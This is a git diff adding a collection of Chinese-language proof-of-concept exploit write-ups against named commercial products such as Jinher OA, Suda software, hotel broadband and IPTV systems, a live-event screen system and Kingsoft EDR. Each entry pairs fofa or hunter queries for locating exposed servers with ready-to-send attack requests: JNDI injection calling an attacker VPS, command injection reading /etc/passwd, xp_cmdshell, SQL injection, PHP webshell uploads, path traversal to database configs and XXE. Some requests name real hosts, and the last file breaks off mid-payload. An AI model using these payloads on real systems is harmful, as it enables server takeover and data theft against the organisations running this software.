+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gfkhwzlwu9779wkv>
\ No newline at end of file
diff --git a/速达软件技术（广州）有限公司多款产品voucherauditdo存在JNID注入漏洞.md b/速达软件技术（广州）有限公司多款产品voucherauditdo存在JNID注入漏洞.md
new file mode 100644
index 0000000..8764536
--- /dev/null
+++ b/速达软件技术（广州）有限公司多款产品voucherauditdo存在JNID注入漏洞.md
@@ -0,0 +1,81 @@
+# 速达软件技术（广州）有限公司多款产品voucherauditdo存在JNID注入漏洞
+
+# 一、漏洞简介
+速达软件技术（广州）有限公司多款产品voucherauditdo存在JNID注入漏洞,攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 速达软件技术（广州）有限公司多款产品
+
+# 三、资产测绘
++ hunter`web.body="速达软件技术（广州）有限公司"`
++ 特征
+
+![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/TlMETPa1inTIybRs/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-675709.png)
+
+![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/TlMETPa1inTIybRs/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-994840.png)
+
+# 四、漏洞复现
+1. 获取dnslog
+
+```plain
+g58b0k.dnslog.cn
+```
+
+![1705075159021-2f829661-f6a2-4877-a2e3-d16320f8cac1.png](./img/TlMETPa1inTIybRs/1705075159021-2f829661-f6a2-4877-a2e3-d16320f8cac1-536627.png)
+
+2. 检测是否存在漏洞
+
+```plain
+GET /account/voucher/voucherauditdo!toEdit.action?billId=${jndi:ldap://g58b0k.dnslog.cn} HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+cmd: whoami
+Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B
+Connection: close
+```
+
+![1705075219543-d6f88494-a50a-487a-a203-e1cca93f0077.png](./img/TlMETPa1inTIybRs/1705075219543-d6f88494-a50a-487a-a203-e1cca93f0077-736341.png)
+
+![1705075233260-58dbace8-b56d-4880-b43e-73f2be788dbe.png](./img/TlMETPa1inTIybRs/1705075233260-58dbace8-b56d-4880-b43e-73f2be788dbe-552308.png)
+
+漏洞利用
+
+[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146450-e43931b2-c4c5-4cf5-859c-4328905c634c.jar)
+
+将`JNDIExploit-1.4-SNAPSHOT.jar`上传到`vps`
+
+```plain
+java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip
+```
+
+![1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb.png](./img/TlMETPa1inTIybRs/1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb-414644.png)
+
+```plain
+GET /account/voucher/voucherauditdo!toEdit.action?billId=${jndi:ldap://vpsip:1389/Basic/TomcatEcho} HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+cmd: whoami
+Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B
+Connection: close
+```
+
+![1705075417091-bed33e43-e858-400a-86f9-6a14714033ca.png](./img/TlMETPa1inTIybRs/1705075417091-bed33e43-e858-400a-86f9-6a14714033ca-450138.png)
+
+
+
+
+
+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yfgdget075d9tggf>
\ No newline at end of file
diff --git a/速达软件技术（广州）有限公司多款产品存在代码执行.md b/速达软件技术（广州）有限公司多款产品存在代码执行.md
new file mode 100644
index 0000000..a9eb2a5
--- /dev/null
+++ b/速达软件技术（广州）有限公司多款产品存在代码执行.md
@@ -0,0 +1,33 @@
+# 速达软件技术（广州）有限公司多款产品存在代码执行
+
+# 一、漏洞简介
+速达软件技术（广州）有限公司多款产品存在代码执行
+
+# 二、影响版本
++ 速达软件技术（广州）有限公司多款产品
+
+# 三、资产测绘
++ hunter`web.body="速达软件技术（广州）有限公司"`
++ 特征
+
+![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/qU0ioA6OURUhWwoZ/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-063607.png)
+
+![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/qU0ioA6OURUhWwoZ/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-739350.png)
+
+# 四、漏洞复现
+隐患url
+
+```plain
+/home
+/login/logout.action
+/login/login!logout.action
+```
+
+[Strruts2全版本漏洞测试工具17-6过WAF版.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146681-3438373c-407e-4d21-a238-4c77f89447f8.jar)
+
+![1699201336386-ba0796bb-835f-48ef-80fc-08e3fcd0cdf4.png](./img/qU0ioA6OURUhWwoZ/1699201336386-ba0796bb-835f-48ef-80fc-08e3fcd0cdf4-601797.png)
+
+
+
+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gm5faht0exttddwm>
\ No newline at end of file
diff --git a/速达软件技术（广州）有限公司多款产品存在文件上传漏洞.md b/速达软件技术（广州）有限公司多款产品存在文件上传漏洞.md
new file mode 100644
index 0000000..1ac47a0
--- /dev/null
+++ b/速达软件技术（广州）有限公司多款产品存在文件上传漏洞.md
@@ -0,0 +1,49 @@
+# 速达软件技术（广州）有限公司多款产品存在文件上传漏洞
+
+# 一、漏洞简介
+速达软件技术（广州）有限公司多款产品存在文件上传漏洞
+
+# 二、影响版本
++ 速达软件技术（广州）有限公司多款产品
+
+# 三、资产测绘
++ hunter`web.body="速达软件技术（广州）有限公司"`
++ 特征
+
+![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/8uIHpAGZiK2xZUfi/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-445073.png)
+
+![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/8uIHpAGZiK2xZUfi/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-623971.png)
+
+# 四、漏洞复现
+```plain
+GET /report/DesignReportSave.jsp?report=../stc.jsp HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=32A62132D706D2E2F3F66875BD5C012A
+Upgrade-Insecure-Requests: 1
+Content-Length: 68
+
+<%@ page contentType="text/plain" %>
+<%
+    out.print("test");
+%>
+```
+
+![1699459017913-2e909a95-490d-49fd-91c6-919310c1a031.png](./img/8uIHpAGZiK2xZUfi/1699459017913-2e909a95-490d-49fd-91c6-919310c1a031-824767.png)
+
+上传文件位置
+
+```plain
+http://xx.xx.xx.xx/stc.jsp
+```
+
+![1699459047529-aa755f62-c725-4f3c-8e94-ac661fecb70f.png](./img/8uIHpAGZiK2xZUfi/1699459047529-aa755f62-c725-4f3c-8e94-ac661fecb70f-697918.png)
+
+
+
+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yapob2yebyvzwrrn>
\ No newline at end of file
diff --git a/邦永PM2项目管理系统Global_UserLogin.aspxSQL注入漏洞.md b/邦永PM2项目管理系统Global_UserLogin.aspxSQL注入漏洞.md
new file mode 100644
index 0000000..220a81f
--- /dev/null
+++ b/邦永PM2项目管理系统Global_UserLogin.aspxSQL注入漏洞.md
@@ -0,0 +1,36 @@
+# 邦永PM2项目管理系统Global_UserLogin.aspx SQL注入漏洞
+
+# 一、漏洞简介
+邦永PM2项目管理系统Global_UserLogin.aspx SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 邦永PM2项目管理系统
+
+# 三、资产测绘
++ hunter`web.body="PM2项目管理系统BS版增强工具.zip"`
++ 特征
+
+![1701347452885-d3cea2a7-432e-40cc-9a7d-3f38f56de6e5.png](./img/rcZ2NB48Dm1SUHjI/1701347452885-d3cea2a7-432e-40cc-9a7d-3f38f56de6e5-486911.png)
+
+# 四、漏洞复现
+```plain
+GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
+Host: pm2.sunwayopto.cn:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1701348148996-78c9e2ba-9e67-47d4-9660-f03ef1fc5448.png](./img/rcZ2NB48Dm1SUHjI/1701348148996-78c9e2ba-9e67-47d4-9660-f03ef1fc5448-854696.png)
+
+sqlmap
+
+```plain
+/Global/Global_UserLogin.aspx?accId=1
+```
+
+![1701348163542-81132564-5077-4727-9372-c4579e401148.png](./img/rcZ2NB48Dm1SUHjI/1701348163542-81132564-5077-4727-9372-c4579e401148-428762.png)
+
+
+
+> 更新: 2024-02-29 23:55:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vcx1cgrng7y325mg>
\ No newline at end of file
diff --git a/酒店宽带运营系统server_ping远程命令执行漏洞.md b/酒店宽带运营系统server_ping远程命令执行漏洞.md
new file mode 100644
index 0000000..8eff2f6
--- /dev/null
+++ b/酒店宽带运营系统server_ping远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# 酒店宽带运营系统server_ping远程命令执行漏洞
+
+# 一、漏洞简介
+安美数字 酒店宽带运营系统 server_ping.php 存在远程命令执行漏洞，漏洞文件中ip参数未过滤造成命令执行。
+
+# 二、影响版本
++ 安美数字 酒店宽带运营系统
+
+# 三、资产测绘
++ fofa`"酒店宽带运营"`
++ 特征
+
+![1716733888763-054f1cd7-9341-4200-9146-ac1991441834.png](./img/ttotGXeiX4zpQ9fZ/1716733888763-054f1cd7-9341-4200-9146-ac1991441834-819573.png)
+
+# 四、漏洞复现
+```rust
+GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../stc.txt&id=1 HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer:
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
+Cookie: PHPSESSID=noei1ghcv9rqgp58jf79991n04
+```
+
+![1716733909837-15f70e37-1a79-41f6-963f-9cf8f0baac48.png](./img/ttotGXeiX4zpQ9fZ/1716733909837-15f70e37-1a79-41f6-963f-9cf8f0baac48-535338.png)
+
+```rust
+/stc.txt
+```
+
+![1716733930150-c5db087e-acac-4280-be9c-23405a570807.png](./img/ttotGXeiX4zpQ9fZ/1716733930150-c5db087e-acac-4280-be9c-23405a570807-124394.png)
+
+
+
+> 更新: 2024-06-01 11:14:22  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gvrg0qu31td8ab01>
\ No newline at end of file
diff --git a/酒店智慧营销IPTV系统userlogin.php存在sql注入漏洞.md b/酒店智慧营销IPTV系统userlogin.php存在sql注入漏洞.md
new file mode 100644
index 0000000..8a86447
--- /dev/null
+++ b/酒店智慧营销IPTV系统userlogin.php存在sql注入漏洞.md
@@ -0,0 +1,28 @@
+# 酒店智慧营销IPTV系统userlogin.php存在sql注入漏洞
+
+子辰视讯IPTV系统拥有电信级全业务功能，支持电视直播（IGMP组播模式和HLS单播模式同时）、4K超高清、时移回看、内网视频点播、外网OTT点播、桌面定制、应用推送、字幕广告、挂角广告、用户认证计费和到期提醒等。该系统    userlogin.php存在sql注入漏洞,攻击者可利用该漏洞获取系统信息。
+
+## fofa
+
+```javascript
+body="xsiptvp"
+```
+
+## poc
+
+```javascript
+POST /xsiptva/cniptv/userlogin.php HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: keep-alive
+Content-Length: 113
+Content-Type: application/x-www-form-urlencoded
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
+
+username=admin' AND (SELECT 6707 FROM (SELECT(SLEEP(5)))mQbf) AND '1'='1&password=admin
+```
+
diff --git a/金华迪加现场大屏互动系统mobile.do.php任意文件上传漏洞.md b/金华迪加现场大屏互动系统mobile.do.php任意文件上传漏洞.md
new file mode 100644
index 0000000..e3fcd74
--- /dev/null
+++ b/金华迪加现场大屏互动系统mobile.do.php任意文件上传漏洞.md
@@ -0,0 +1,24 @@
+# 金华迪加现场大屏互动系统mobile.do.php任意文件上传漏洞
+
+金华迪加 现场大屏互动系统 mobile.do.php 存在任意文件上传漏洞，未经身份验证远程攻击者可利用该漏洞代码执行，写入WebShell,进一步控制服务器权限。
+
+## fofa
+
+```javascript
+body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
+```
+
+## poc
+
+```javascript
+POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Connection: close
+
+filetype=php&imgbase64=PD9waHAgcGhwaW5mbygpO3VubGluayhfX0ZJTEVfXyk7Pz4=
+```
+
+![image-20241101195240598](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011952654.png)
\ No newline at end of file
diff --git a/金华迪加网络科技有限公司现场大屏互动系统mobile.do.php接口存在文件上传漏洞.md b/金华迪加网络科技有限公司现场大屏互动系统mobile.do.php接口存在文件上传漏洞.md
new file mode 100644
index 0000000..d0706e1
--- /dev/null
+++ b/金华迪加网络科技有限公司现场大屏互动系统mobile.do.php接口存在文件上传漏洞.md
@@ -0,0 +1,48 @@
+# 金华迪加网络科技有限公司现场大屏互动系统mobile.do.php接口存在文件上传漏洞
+
+# 一、漏洞简介
+金华迪加网络科技有限公司是一家民营企业，专注于开发和优化现场互动系统平台,其主要产品是现场活动大屏幕系统。这个系统被设计用于增强活动现场的互动性，提供技术支持给合作企业。金华迪加网络科技有限公司现场大屏互动系统mobile.do.php接口存在文件上传漏洞，未经身份验证的攻击者通过漏洞上传恶意后门文件，执行任意代码，从而获取到服务器权限。
+
+# 二、影响版本
++ 现场大屏互动系统
+
+# 三、资产测绘
++ fofa`body="/wall/themes/meepo/assets/images/defaultbg.jpg"||title="现场活动大屏幕系统"`
++ 特征
+
+![1730269921021-87848d90-a4b8-45ad-a45f-50ab8325acda.png](./img/pq8x-rL1g-iCOQR9/1730269921021-87848d90-a4b8-45ad-a45f-50ab8325acda-824803.png)
+
+# 三、漏洞复现
+```plain
+POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Connection: keep-alive
+Cookie: PHPSESSID=b8u1t0sl69oh62hn91t3tb61a2
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Priority: u=0, i
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 20
+
+filetype=php&imgbase64=PD9waHAgZWNobyBtZDUoMSk7dW5saW5rKF9fRklMRV9fKTsgPz4=
+```
+
+![1730269929978-dad97914-e3b0-4c81-b804-9777de2383ea.png](./img/pq8x-rL1g-iCOQR9/1730269929978-dad97914-e3b0-4c81-b804-9777de2383ea-285779.png)
+
+```plain
+/data/pic/pic_173026980616947.php
+```
+
+![1730269949318-34320c82-8bd3-454c-9e09-23af98caed79.png](./img/pq8x-rL1g-iCOQR9/1730269949318-34320c82-8bd3-454c-9e09-23af98caed79-931197.png)
+
+
+
+> 更新: 2024-11-27 10:00:08  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ooo15ulb6mttxdqb>
\ No newline at end of file
diff --git a/金和JC6协同管理平台oaplusrangedownloadfile存在文件下载漏洞.md b/金和JC6协同管理平台oaplusrangedownloadfile存在文件下载漏洞.md
new file mode 100644
index 0000000..95d0bce
--- /dev/null
+++ b/金和JC6协同管理平台oaplusrangedownloadfile存在文件下载漏洞.md
@@ -0,0 +1,29 @@
+# 金和JC6协同管理平台oaplusrangedownloadfile存在文件下载漏洞
+
+金和数字化智能办公平台（简称JC6）是一款结合了人工智能技术的数字化办公平台，为企业带来了智能化的办公体验和全面的数字化转型支持。金和JC6协同管理平台oaplusrangedownloadfile 存在文件下载漏洞，攻击者可利用该漏洞获取服务器敏感信息。
+
+## fofa
+
+```javascript
+app="Jinher-OA"
+```
+
+## poc
+
+```javascript
+GET /jc6/JHSoft.WCF/login/oaplusrangedownloadfile?filename=../WEB-INF/classes/db.properties HTTP/1.1
+Host: 
+accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412132156695.webp)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/TjNcd628M9COW2H9nTMPKQ
diff --git a/金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞.md b/金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..19200b6
--- /dev/null
+++ b/金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# 金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞
+
+北京金和网络股份有限公司C6协同管理平台DBModules.aspx存在SQL注入漏洞，攻击者可获取数据库敏感数据。
+
+## fofa
+
+```yaml
+body="c6/Jhsoft.Web.login"
+```
+
+## poc
+
+```java
+GET /C6/JHSoft.Web.WorkFlat/DBModules.aspx/?interfaceID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
+Host: 123.57.26.236
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/tv_5OOH6CoQDZsZKzu8CDw
\ No newline at end of file
diff --git a/金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568).md b/金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568).md
new file mode 100644
index 0000000..8b1ac8d
--- /dev/null
+++ b/金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568).md
@@ -0,0 +1,25 @@
+# 金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568)
+
+金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞，攻击者可利用xxe漏洞获取服务器敏感数据，可读取任意文件以及ssrf攻击，存在一定的安全隐患。
+
+## fofa
+
+```javascript
+app="金和网络-金和OA"
+```
+
+## poc
+
+```javascript
+POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Content-Type: application/xml
+
+<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://wwwwwwwwwwwwwwww.t07q8o.dnslog.cn"> %remote;]>
+```
+
+![image-20241029095818142](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410290958202.png)
\ No newline at end of file
diff --git a/金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞.md b/金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..8dc41da
--- /dev/null
+++ b/金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞
+
+金和oa协同管理平台（又称金和C6协调管理平台），共有20多个应用模块，160多个应用子模块，涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围。该系统存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+app="金和网络-金和OA"
+```
+
+## poc
+
+```javascript
+GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:2'-- HTTP/1.1
+Host: 
+Connection: close
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502131412695.webp)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/QvQXcg1UeNzILoY7n8c57g
\ No newline at end of file
diff --git a/金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞.md b/金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞.md
new file mode 100644
index 0000000..707adbc
--- /dev/null
+++ b/金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞
+
+金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+app="金和网络-金和OA"
+```
+
+## poc
+
+```javascript
+POST /C6/JQueryUpload/AjaxFile/jQueryUploadify.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+ 
+type=delete&fileId=-99';WAITFOR+DELAY'0:0:5'--
+```
\ No newline at end of file
diff --git a/金和OA-jc6-clobfield-SQL注入漏洞.md b/金和OA-jc6-clobfield-SQL注入漏洞.md
new file mode 100644
index 0000000..98d46f9
--- /dev/null
+++ b/金和OA-jc6-clobfield-SQL注入漏洞.md
@@ -0,0 +1,19 @@
+## 金和OA jc6 clobfield SQL注入漏洞
+金和OA jc6 ljc6/servlet/clobfield接口处存在SQL注入漏洞，攻击者可获取数据中中敏感信息。
+
+## fofa
+```
+
+title="金和协同管理平台" || body="js/PasswordCommon.js" || body="js/PasswordNew.js" || body="Jinher Network" || (body="c6/Jhsoft.Web.login" && body="CloseWindowNoAsk") || header="Path=/jc6" || (body="JC6金和协同管理平台" && body="src=\"/jc6/platform/") || body="window.location = \"JHSoft.MobileApp/Default.htm\";" || banner="Path=/jc6"
+```
+
+## poc
+```
+POST /jc6/servlet/clobfield HTTP/1.1
+host:127.0.0.1
+
+key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11%27%2F**%2Fand%2F**%2FCONVERT%28int%2C%40%40version%29%3D1%2F**%2Fand%2F**%2F%27%27%3D%27
+```
+![image](https://github.com/wy876/POC/assets/139549762/09333181-7373-4930-ad60-91e168709564)
+
+
diff --git a/金和OAC6-GetSqlData.aspx存在SQL注入漏洞.md b/金和OAC6-GetSqlData.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..cdcc842
--- /dev/null
+++ b/金和OAC6-GetSqlData.aspx存在SQL注入漏洞.md
@@ -0,0 +1,14 @@
+## 某和OA C6-GetSqlData.aspx SQL注入漏洞
+```
+POST /C6/Control/GetSqlData.aspx/.ashx HTTP/1.1
+Host: ip:port 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
+Connection: close
+Content-Length: 189
+Content-Type: text/plain
+Accept-Encoding: gzip
+
+exec master..xp_cmdshell 'ipconfig'
+```
+
+![image-20241231151107209](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311511460.png)
diff --git a/金和OA系统接口SignUpload.ashx存在SQL注入漏洞.md b/金和OA系统接口SignUpload.ashx存在SQL注入漏洞.md
new file mode 100644
index 0000000..0d4dabb
--- /dev/null
+++ b/金和OA系统接口SignUpload.ashx存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 金和OA系统接口SignUpload.ashx存在SQL注入漏洞
+
+金和OA系统接口SignUpload.ashx存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="JHSoft.Web.AddMenu" || app="金和网络-金和OA" || app="Jinher-OA"
+```
+
+## poc
+
+```java
+GET /C6/Jhsoft.Web.ask/SignUpload.ashx?token=1%3BWAITFOR+DELAY+%270%3A0%3A%201%27+--%20and%201=1_123_123&filename=1 HTTP/1.1
+Host: ip:port 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
+Connection: close
+Content-Length: 189
+Content-Type: text/plain
+Accept-Encoding: gzip
+```
+
+![image-20240920134727109](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409201347183.png)
diff --git a/金山EDR-RCE漏洞.md b/金山EDR-RCE漏洞.md
new file mode 100644
index 0000000..118494f
--- /dev/null
+++ b/金山EDR-RCE漏洞.md
@@ -0,0 +1,60 @@
+## 金山EDR RCE漏洞
+```
+开启⽇志 /Console/inter/handler/change_white_list_cmd.php id参数
+POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
+Host: 192.168.24.3:6868
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101
+Firefox/114.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 131
+Origin: http://192.168.24.3:6868
+Connection: close
+Referer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
+
+{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-
+AE5A","id":"111;set//global//general_log=on;","type":"0"}}
+
+设置日志php文件
+POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
+Host: 192.168.24.3:6868
+Content-Length: 195
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/114.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://192.168.24.3:6868
+Referer: http://192.168.24.3:6868/
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7
+Connection: close
+
+{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-
+AE5A","id":"111;set//global//general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f6368656
